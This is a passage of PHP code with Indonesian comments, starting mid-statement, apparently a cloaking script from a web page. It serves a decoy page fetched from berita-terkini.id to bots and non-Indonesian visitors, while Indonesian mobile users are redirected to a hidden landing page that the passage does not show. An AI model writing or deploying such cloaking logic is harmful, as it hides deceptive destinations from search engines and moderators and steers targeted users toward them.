isMobile(); // Jika bot atau bukan dari Indonesia, tampilkan halaman white if ($isBot || $country !== 'Indonesia') { echo file_get_contents('https://berita-terkini.id/pps/white.php'); ob_end_flush(); exit(); } // Jika dari Indonesia dan perangkat mobile, redirect ke landing page if ($isMobile && $country === 'Indonesia') { echo '
Redirecting to the landing page...
'; ob_end_flush(); exit(); } // Selain itu tampilkan https://berita-terkini.id/pps/white.php echo file_get_contents('https://berita-terkini.id/pps/white.php'); ob_end_flush(); ?>